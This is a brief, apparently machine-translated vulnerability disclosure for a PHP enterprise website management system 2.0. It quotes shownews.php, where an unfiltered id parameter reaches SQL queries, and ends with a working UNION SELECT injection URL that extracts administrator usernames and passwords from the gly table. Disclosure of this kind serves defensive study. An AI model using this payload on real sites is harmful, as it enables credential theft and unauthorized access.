V2.0 shownews.php Injection Vulnerability in PHP Enterprise website management System

Program name: Network PHP Enterprise website Management System 2.0 free version

The following is a brief description of the system's features:

1, the use of DIV+CSS layout tested compatible with IE and Firefox mainstream browser, other browsers have not been tested.

2, product news level three unlimited classification.

3, backstage can set up such as Administrator account password, site title, the bottom of the site copyright and other information.

4. Backstage with the latest version of Xheditor Editor, Xheditor is a cross-platform open source mini XHTML editor component based on jquery development.

5, Backstage image column can be related to the slide, links, Logo,banner, etc. to modify the settings.

5, backstage can delete product news in bulk.

Vulnerability file shownews.php, here is the program section code:

<?PHPinclude_once("wzdy.php");if(isset($_get[' ID ']))//detects if the ID variable is set{    $id=$_get["id"];} Else{          Echo"<script language= ' JavaScript ' >"; Echo"Alert (' Please enter the correct id! ‘);"; Echo"Location= ' index.php ';"; Echo"</script>"; Exit; }    $sql 4= "SELECT * FROM news where id=$id";//unfiltered the ID variable directly into the SQL query statement, output to the $SQL4 variable    $result 4=mysql_query($sql 4);//assigning the $SQL4 variable to the $RESULT4 variable    if($nums=mysql_num_rows($result 4))//returns the result of the $RESULT4 variable, which means that the $title variable, $content variable, shows the result of the maliciously injected statement we constructed    {           $rs 4=Mysql_fetch_array($result 4); $title=$rs 4["title"]; $content=$rs 4["Content"]; $hits=$rs 4["Hits"]; $FBSJ=Date("Y-m-d",Strtotime($rs 4[' FBSJ '])); $sql= "Update news set hits=hits+1 where id=$id"; mysql_query($sql); } Else {Echo"<script language= ' JavaScript ' >"; Echo"Alert (' Please enter the correct id! ‘);";Echo"Location= ' index.php ';"; Echo"</script>";Exit; }?>

Vulnerability Exp:

Http://192.168.1.5/websitetempeltest/qywphp2/shownews.php?id=5 and 1=2 UNION SELECT 1,2,unhex (Hex (concat (0x5e5e5e, username,0x7c,password,0x5e5e5e)), 4,5,6,7 from gly